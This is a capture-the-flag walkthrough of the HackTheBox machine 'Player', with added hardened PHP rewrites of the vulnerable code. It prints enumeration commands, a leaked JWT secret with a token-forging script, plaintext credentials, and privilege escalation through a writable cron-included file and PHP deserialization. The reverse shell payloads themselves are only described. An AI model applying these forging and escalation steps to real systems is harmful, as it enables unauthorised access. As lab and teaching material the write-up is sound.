HackTheBox - Player

Last updated 4 years ago

Nmap scan results (All port scan)

This version string belongs to the Ubuntu Trusty package, which means no Docker container is involved.

Subdomain Enumeration using wfuzz

wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --hw 30 -H "Host: FUZZ.player.htb" 10.10.10.145

Adding the discovered subdomains to the /etc/hosts file.

Using gobuster to discover files and directories

Found this on chat.player.htb, which can be used for further exploitation.

Staging subdomain (staging.player.htb) - exposing sensitive files

Main subdomain (player.htb) - exposing the source code of the main app

Discovering sensitive information on staging.player.htb

Error message found on the contact.php page: Database connection failed. Unknown variable user in /var/www/backup/service_config fatal error in /var/www/staging/fix.php

Using gobuster's discover backup feature

gobuster dir -w custom_wordlist -u http://player.htb/launcher/ --discover-backup
#Code for dee8dc8a47256c64630d803a4c40786c.php
<?php
require 'vendor/autoload.php';

use \Firebase\JWT\JWT;

if(isset($_COOKIE["access"]))
{
	$key = '_S0_R@nd0m_P@ss_';
	$decoded = JWT::decode($_COOKIE["access"], base64_decode(strtr($key, '-_', '+/')), ['HS256']);
	if($decoded->access_code === "0E76658526655756207688271159624026011393")
	{
		header("Location: 7F2xxxxxxxxxxxxx/");
	}
	else
	{
		header("Location: index.html");
	}
}
else
{
	$token_payload = [
	  'project' => 'PlayBuff',
	  'access_code' => 'C0B137FE2D792459F26FF763CCE44574A5B5AB03'
	];
	$key = '_S0_R@nd0m_P@ss_';
	$jwt = JWT::encode($token_payload, base64_decode(strtr($key, '-_', '+/')), 'HS256');
	$cookiename = 'access';
	setcookie('access',$jwt, time() + (86400 * 30), "/");
	header("Location: index.html");
}

?>

Creating Forged JWT Token

Now that we have the secret key for the JWT, we can forge our own token. Let's write a PHP script for this.

#Forged token script
<?php
require "vendor/autoload.php";
use \Firebase\JWT\JWT;

// Same secret and key derivation as the leaked launcher source; only access_code differs.
$secret_Key = "_S0_R@nd0m_P@ss_";
$token_payload = [
    'project' => 'PlayBuff',
    'access_code' => '0E76658526655756207688271159624026011393'
];
echo JWT::encode(
    $token_payload,
    base64_decode(strtr($secret_Key, '-_', '+/')),
    'HS256'
);
?>

After changing the access cookie, we got access to this page.
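The forgery works because the launcher ships its HMAC secret as a string literal in the source, and a backup copy of that file sat in the web root. The following is an added example, not code from the box or from the launcher's author: a hardened version of the same cookie check that keeps the original flow (issue a token, redirect on a matching access_code) but removes the defects. It assumes firebase/php-jwt 5.x (the same encode/decode signatures the original uses), PHP 7.3+ for the setcookie() options array, and a JWT_SECRET environment variable set in the web server configuration outside the document root; the constructed secret shown in the comment is only an example.

```php
<?php
// Added example (not the box's launcher): hardened cookie/JWT handling.
// Assumptions: firebase/php-jwt 5.x, PHP >= 7.3, JWT_SECRET env var set by the web server.
require 'vendor/autoload.php';

use \Firebase\JWT\JWT;

const ACCESS_GRANTED = "0E76658526655756207688271159624026011393";
const TOKEN_TTL = 3600;

// The original derived its HMAC key from a literal in the PHP file, which the .bak copy
// leaked. Load raw key bytes from the environment and refuse to run with a weak key.
function jwtKey(): string
{
    $b64 = getenv('JWT_SECRET');                 // constructed example: output of `openssl rand -base64 32`
    $key = $b64 === false ? false : base64_decode($b64, true);
    if ($key === false || strlen($key) < 32) {
        http_response_code(500);
        exit('server misconfigured: JWT_SECRET must be >= 32 random bytes, base64 encoded');
    }
    return $key;
}

function issueToken(string $key): string
{
    $now = time();
    return JWT::encode([
        'project'     => 'PlayBuff',
        'access_code' => 'C0B137FE2D792459F26FF763CCE44574A5B5AB03',
        'iat'         => $now,
        'exp'         => $now + TOKEN_TTL,       // the original token never expired
    ], $key, 'HS256');
}

// Returns the decoded payload or null. The algorithm list is pinned to HS256, so an
// "alg":"none" token or a key-confusion attempt is rejected inside the library; every
// library failure (bad signature, expired, malformed) maps to "not authorised".
function verifyToken(string $token, string $key): ?object
{
    try {
        return JWT::decode($token, $key, ['HS256']);
    } catch (\UnexpectedValueException | \DomainException $e) {
        return null;
    }
}

$key = jwtKey();
if (isset($_COOKIE['access'])) {
    $decoded = verifyToken($_COOKIE['access'], $key);
    if ($decoded !== null && ($decoded->access_code ?? null) === ACCESS_GRANTED) {
        header('Location: 7F2xxxxxxxxxxxxx/');
    } else {
        header('Location: index.html');
    }
} else {
    // HttpOnly/Secure/SameSite: the token is not readable by page scripts and not sent cross-site.
    setcookie('access', issueToken($key), [
        'expires'  => time() + TOKEN_TTL,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    header('Location: index.html');
}
```

With the key outside the source tree, a leaked backup of the launcher no longer lets anyone mint a valid token, and an expired or tampered cookie falls through to the same redirect as no cookie at all. The backup files themselves are a separate finding: nothing under the document root should carry a .bak or similar suffix, which is exactly what the --discover-backup option above finds.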

Exploiting FFmpeg HLS vulnerability

Get the gen_xbin_avi.py file and analyze it for a better understanding. Let's run the script now.

Let's read the /var/www/backup/service_config file using this vulnerability.

Credentials found - telegen : d-bC|jC!2uepS/w

Let's use these credentials to connect over SSH (both ports 22 and 6686).

We land in a restricted shell where we can only run a few commands: clear, exit, help, history, lpath and lsudo.

There is nothing more we can do here. Let's search for known OpenSSH vulnerabilities.

We can try the xauth command injection vulnerability. The script can be downloaded with searchsploit -m multiple/remote/39569.py

Got credentials for peter : CQXpm\z)G5D#%S$y=

Let's try to log in to Codiad running at dev.staging.htb

RCE on dev.staging.htb (CVE-2018-14009)

Change this part of the script to get remote code execution; here we are using a reverse shell script.

Let's run the script to get a reverse shell as www-data.

Privilege Escalation (Method 1)

A cron job runs as root and executes the /var/lib/playbuff/buff.php file. Let's check the file and see whether we can exploit it.

<?php
include("/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php");
class playBuff
{
        public $logFile="/var/log/playbuff/logs.txt";
        public $logData="Updated";

        public function __wakeup()
        {
                file_put_contents(__DIR__."/".$this->logFile,$this->logData);
        }
}
$buff = new playBuff();
$serialbuff = serialize($buff);
$data = file_get_contents("/var/lib/playbuff/merge.log");
if(unserialize($data))
{
        $update = file_get_contents("/var/lib/playbuff/logs.txt");
        $query = mysqli_query($conn, "update stats set status='$update' where id=1");
        if($query)
        {
                echo 'Update Success with serialized logs!';
        }
}
else
{
        file_put_contents("/var/lib/playbuff/merge.log","no issues yet");
        $update = file_get_contents("/var/lib/playbuff/logs.txt");
        $query = mysqli_query($conn, "update stats set status='$update' where id=1");
        if($query)
        {
                echo 'Update Success!';
        }
}
?>

So there are two ways to exploit this: the first is to include a malicious file and get root access, and the other is the deserialization vulnerability.

We have privileges to read/write /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php

So we can edit this file and place our code in it; as soon as the cron job runs, this file will be executed as root.

This script will send us a ping request as soon as it gets executed.

Let's get a reverse shell now.

Privilege Escalation (Method 2)

Exploiting the PHP deserialization vulnerability

We have write privileges on /var/lib/playbuff/merge.log, and the PHP script reads the data from merge.log and calls unserialize() on it. Because the class has a __wakeup() method that writes $logData to __DIR__."/".$logFile, a crafted object in merge.log turns into a file write performed by root.
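For comparison, the following is an added example, not the box's buff.php: the same cron task with its code-level defects removed. It keeps the original structure (read state, write a log file, update the stats row) and assumes, as the original does, that $conn is the mysqli handle provided by the included config and that the state lives under /var/lib/playbuff; the JSON "note"/"logFile"/"logData" keys are this example's own. The fourth defect, a root cron job including a file that www-data can write, is a permissions problem no PHP change can fix: the included config and the script itself must be owned by root and not writable by anyone else.

```php
<?php
// Added example (not the box's buff.php): hardened version of the cron task.
// Assumptions: $conn comes from the included config; state directory is /var/lib/playbuff.
include("/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php");

const LOG_DIR   = "/var/lib/playbuff";
const MERGE_LOG = LOG_DIR . "/merge.log";
const LOGS_TXT  = LOG_DIR . "/logs.txt";

// The state is plain data, so it is stored as JSON. json_decode() with assoc=true only
// produces arrays, so no __wakeup()/__destruct() gadget can run while reading a file an
// unprivileged user can write. If unserialize() cannot be avoided, the equivalent is
// unserialize($data, ['allowed_classes' => false]), which turns any embedded object into
// __PHP_Incomplete_Class and never calls its magic methods.
function readMergeLog(): ?array
{
    $raw = @file_get_contents(MERGE_LOG);
    if ($raw === false) {
        return null;
    }
    $state = json_decode($raw, true);
    return is_array($state) ? $state : null;
}

// The original __wakeup() wrote to __DIR__ . "/" . $this->logFile with an attacker-chosen
// logFile, i.e. a root-owned write to any path via "../". Keep only the basename and
// confine the result to LOG_DIR, so the write can never leave the state directory.
function safeLogPath(string $name): string
{
    $file = basename($name);
    if ($file === '' || $file === '.' || $file === '..' || strpos($file, "\0") !== false) {
        throw new \InvalidArgumentException("bad log file name");
    }
    return LOG_DIR . "/" . $file;
}

// The original interpolated the file contents straight into the SQL string; bind instead.
function writeStatus(mysqli $conn, string $status): bool
{
    $stmt = $conn->prepare("UPDATE stats SET status = ? WHERE id = 1");
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param("s", $status);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

$state = readMergeLog();
if ($state === null) {
    $state = ['note' => 'no issues yet'];
    file_put_contents(MERGE_LOG, json_encode($state));
}

$logFile = safeLogPath($state['logFile'] ?? 'logs.txt');
file_put_contents($logFile, substr((string)($state['logData'] ?? 'Updated'), 0, 4096));

$update = file_get_contents(LOGS_TXT);
if ($update !== false && writeStatus($conn, $update)) {
    echo "Update Success!\n";
}
```

The three changes line up with the three ways the original could be abused: no object graph is ever built from merge.log, the log path cannot traverse out of /var/lib/playbuff, and the contents of logs.txt reach MySQL only as a bound parameter rather than as part of the query text.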

Looks like this website is vulnerable to the FFmpeg HLS vulnerability.